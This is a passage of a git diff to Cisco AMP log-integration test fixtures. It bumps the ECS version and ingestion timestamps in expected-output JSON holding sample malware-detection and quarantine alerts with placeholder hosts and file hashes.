                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":747000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532306\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3659,7 +3659,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3691,7 +3691,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581807110Z",
+                "ingested": "2021-09-13T18:06:53.271972769Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":371000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532305\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -3748,7 +3748,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -3776,7 +3776,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:17.581809002Z",
+                "ingested": "2021-09-13T18:06:53.271974626Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667575396565000,\"timestamp\":1610705572,\"timestamp_nanoseconds\":971000000,\"date\":\"2021-01-15T10:12:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667575396565008\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log
similarity index 100%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json
similarity index 97%
rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json
rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json
index 26bab6555f6..2774990edfc 100644
--- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json
@@ -12,7 +12,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -38,7 +38,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:29.843493642Z",
+                "ingested": "2021-09-13T18:07:04.510322261Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6508397899087348000,\"timestamp\":1610659036,\"timestamp_nanoseconds\":295927133,\"date\":\"2021-01-14T21:17:16+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.6A37D750F0-100.SBX.TG\",\"detection_id\":\"6508397899087347713\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -96,7 +96,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -116,7 +116,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:29.843500994Z",
+                "ingested": "2021-09-13T18:07:04.510327231Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14930696955218,\"timestamp\":1610656706,\"timestamp_nanoseconds\":844899579,\"date\":\"2021-01-14T20:38:26+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610656706,\"start_date\":\"2021-01-14T20:38:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T20:38:26.000Z",
@@ -172,7 +172,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -192,7 +192,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843503140Z",
+                "ingested": "2021-09-13T18:07:04.510329357Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -247,7 +247,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -267,7 +267,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843505081Z",
+                "ingested": "2021-09-13T18:07:04.510331307Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -333,7 +333,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -363,7 +363,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843507024Z",
+                "ingested": "2021-09-13T18:07:04.510333230Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626319\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":7120,\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -424,7 +424,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -456,7 +456,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843508958Z",
+                "ingested": "2021-09-13T18:07:04.510335159Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -518,7 +518,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -548,7 +548,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843510902Z",
+                "ingested": "2021-09-13T18:07:04.510337055Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626317\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"process_id\":4788,\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -609,7 +609,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -641,7 +641,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843512823Z",
+                "ingested": "2021-09-13T18:07:04.510338972Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":478000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"28242311.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\28242311.exe\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\",\"sha1\":\"f504774b72acfb23a46217aec9c6559fd7e4df64\",\"md5\":\"b5ede95ec8bc4ad6984758be42b152bd\"}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -694,7 +694,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -714,7 +714,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843514761Z",
+                "ingested": "2021-09-13T18:07:04.510340840Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":587000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626318\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -765,7 +765,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -785,7 +785,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843516637Z",
+                "ingested": "2021-09-13T18:07:04.510342728Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412680266518626000,\"timestamp\":1610655485,\"timestamp_nanoseconds\":494000000,\"date\":\"2021-01-14T20:18:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6412680266518626316\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -836,7 +836,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -856,7 +856,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843518525Z",
+                "ingested": "2021-09-13T18:07:04.510344635Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303574240493599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -911,7 +911,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -931,7 +931,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843520650Z",
+                "ingested": "2021-09-13T18:07:04.510346697Z",
